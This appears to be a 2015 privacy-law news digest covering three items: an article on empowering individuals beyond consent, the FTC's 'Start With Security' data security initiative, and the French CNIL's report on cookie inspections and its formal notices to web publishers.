How do we focus on individuals and ensure meaningful control and the empowerment of individuals in the modern information age? What data privacy tools would drive empowerment in the digital world of today and tomorrow, perhaps more effectively and more nimbly than traditional individual consent? At a time when many countries are legislating or revising their data privacy laws and organizations are searching for best practices to embed in their business models, these questions are more relevant today than ever. In an article published on July 2, 2015, in the International Association of Privacy Professionals’ Privacy Perspective, entitled Empowering Individuals Beyond Consent, Bojana Bellamy and Markus Heyder of the Centre for Information Policy Leadership at Hunton & Williams argue that consent is no longer the best or only way to provide control and protect individuals. There are alternative and additional tools in our toolkit that can deliver effective data privacy and greater individual empowerment.

These include legitimate interest processing, new transparency, focus on risk and impact on individuals, individuals’ right of access and correction, and fair processing requirements. Bellamy and Heyder point to these “individual empowerment” mechanisms as effective privacy protection tools that ensure real focus on individuals. When used appropriately, these mechanisms likely will decrease the overuse of consent and limit consent to appropriate situations.

FTC Launches Data Security Initiative

On June 30, 2015, the Federal Trade Commission announced its new “Start With Security” business education initiative, which will provide businesses with information on data security and how to protect consumer information.

The initiative includes a guidance document that provides data security guidance based on the FTC’s 53 cases related to data security, and lays out “ten key steps to effective data security.” The steps include (1) controlling access to data, (2) requiring secure passwords and authentication, and (3) establishing procedures to ensure security measures are current and address vulnerabilities. The FTC also has launched “a one-stop website that consolidates the Commission’s data security information for businesses.”

In addition to the guidance and website, the initiative will include a series of conferences to be held across the country, the first of which will be held in San Francisco on September 9, 2015.

Discussing the initiative, Jessica Rich, the Director of the FTC’s Bureau of Consumer Protection, stated, “[a]lthough we bring cases when businesses put data at risk, we’d much rather help companies avoid problems in the first place.”

French Data Protection Authority Issues Report on Cookie Inspections

On June 30, 2015, the French Data Protection Authority (the “CNIL”) summarized the results of the cookie inspections it conducted at the end of 2014.

One year after the publication of its cookie law recommendation (the “Recommendation”) in December 2013, the CNIL conducted 24 on-site inspections, 27 remote inspections and 2 hearings to assess website compliance with the Recommendations. The inspections revealed that, in general, websites do not sufficiently inform web users of the use of cookies and do not obtain their consent before placing cookies on their devices. In addition, all of the websites inspected by the CNIL that have implemented cookie banners to inform users of the websites’ cookie use, placed cookies before the users consented to the use of cookies (e.g., by continuing to browse the website). The CNIL also observed that websites often invite users to adjust their browser settings to refuse cookies. According to the CNIL, however, browser settings constitute a compliant opt-out mechanism only in very limited circumstances.

The CNIL, therefore, served a formal notice on approximately 20 web publishers to comply with French cookie requirements within a prescribed period of time. The formal notices are not a sanction under French law. The CNIL will impose a sanction (i.e., a fine) only if the relevant web publishers do not comply with the formal notice within the prescribed period of time. The CNIL stated that the notices do not relate to the use of analytics cookies, which may be exempt from the consent requirement in certain circumstances under French law.